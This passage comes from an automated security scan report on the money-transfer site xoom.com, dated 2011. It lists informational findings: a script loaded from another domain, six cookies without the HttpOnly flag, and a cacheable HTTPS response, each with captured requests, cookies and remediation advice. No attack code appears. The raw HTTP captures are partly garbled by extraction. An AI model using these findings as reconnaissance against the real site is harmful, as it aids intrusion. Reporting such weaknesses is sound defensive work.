HTTP/1.1 200 OKece2db8babf40e"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml:la...[SNIP]... <script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js"> </script>...[SNIP]...
7.4. https://www.xoom.com/sendmoneynow/signUp
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The response dynamically includes the following script from another domain:https://www.sc.pages05.net/lp/static/js/iMAWebCookie.js?6504a503-12dc860ffe2-37c504b367ce64f028215bda5330c1de&h=www.pages05.net
Request
GET /sendmoneynow/signUp?intcid=home2_____signup HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/sendmoneynow/homeE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876689|session#1320876608475-967538#1320878489; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_visit%3DNew%3B%20s_sq%3Dxoom-prod%253D%252526pid%25253Dhome.home%25252520-xoom%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.xoom.com%2525252Fsendmoneynow%2525252FsignUp%2525253Fintcid%2525253Dhome2_____signup%252526ot%25253DA%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878449571%3B%20s_nr%3D1320876649573-New%7C1323468649573%3B%20s_gpv_pn%3Dhome.home%2520-xoom%7C1320878449575%3B%20s_nr2%3D1320876649578-New%7C1478556649578%3B%20s_vs%3D1%7C1320878449585%3B
Response
HTTP/1.1 200 OK475ea664b095e2"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... <script src="https://www.sc.pages05.net/lp/static/js/iMAWebCookie.js?6504a503-12dc860ffe2-37c504b367ce64f028215bda5330c1de&h=www.pages05.net" type="text/javascript"> </script>...[SNIP]...
8. Cookie without HttpOnly flag set
previous
next
There are 6 instances of this issue:
Issue background
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
8.1. https://www.xoom.com/sendmoneynow/home
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/home
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:loc_1=en_US; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:17 GMT; Path=/
Request
GET /sendmoneynow/home HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7=436274186.20480.0000
Response
HTTP/1.1 200 OKSet-Cookie: loc_1=en_US; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:17 GMT; Path=/ ece2db8babf40e"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml:la...[SNIP]...
8.2. https://www.xoom.com/siteContent/xoom-release-7.0.4/css/ocb/page/home2.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/css/ocb/page/home2.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/
Request
GET /siteContent/xoom-release-7.0.4/css/ocb/page/home2.css HTTP/1.1;q=0.7/sendmoneynow/home=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 200 OKSet-Cookie: BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ /../img/ocb/home2/body-background.png) 0 0 repeat-x;}.newlayout{margin:0 auto;width:960px;}a{color:#17338F;text-decoration:none;}.xoom-header{background:none;padding-bottom:22...[SNIP]...
8.3. https://www.xoom.com/siteContent/xoom-release-7.0.4/css/ocb/xoom-core.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/css/ocb/xoom-core.css
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/
Request
GET /siteContent/xoom-release-7.0.4/css/ocb/xoom-core.css HTTP/1.1;q=0.7/sendmoneynow/home=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 200 OKSet-Cookie: BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ ,sans-serif;color:#000;background:#FFF;padding:0;margin:0;}body,div,dl,dt,dd,h1,h2,h3,h4,h5,h6,pre,code,form,fieldset,legend,input,textarea,p,blockquote,th,td{...[SNIP]...
8.4. https://www.xoom.com/siteContent/xoom-release-7.0.4/img/ocb/logo247.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/img/ocb/logo247.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/
Request
GET /siteContent/xoom-release-7.0.4/img/ocb/logo247.png HTTP/1.1/*;q=0.5;q=0.7/sendmoneynow/home=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 200 OKSet-Cookie: BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ .tEXtSoftware.Adobe ImageReadyq.e<...0PLTE.3.E.#......d.H........l...............au.CZ....",tF....tRNS.................#].....IDATx..Z... ..........N....VJ&..L.]\,...[SNIP]...
8.5. https://www.xoom.com/siteContent/xoom-release-7.0.4/js/xoom-core.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/js/xoom-core.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/
Request
GET /siteContent/xoom-release-7.0.4/js/xoom-core.js HTTP/1.1;q=0.7/sendmoneynow/home=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 200 OKSet-Cookie: BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ {metadata:{defaults:{type:"class",name:"metadata",cre:/({.*})/,single:"metadata"},setType:function(type,name){this.defaults.type=type;this.defaults.name=name},get:function(elem,o...[SNIP]...
8.6. https://www.xoom.com/siteContent/xoom-release-7.0.4/js/xoom-init.js
previous
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/js/xoom-init.js
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/
Request
GET /siteContent/xoom-release-7.0.4/js/xoom-init.js HTTP/1.1;q=0.7/sendmoneynow/home=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 200 OKSet-Cookie: BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ ...[SNIP]...
9. Cacheable HTTPS response
previous
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/img/ocb/favicon.ico
Issue description
Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.
Issue remediation
The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:Cache-control: no-store Pragma: no-cache
Request
GET /siteContent/xoom-release-7.0.4/img/ocb/favicon.ico HTTP/1.1/*;q=0.5;q=0.7=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 200 OKCache-Control: max-age=1209600,public ...............3...................................................................................................................[SNIP]...
Report generated by XSS.CX at Thu Nov 10 10:31:32 CST 2011.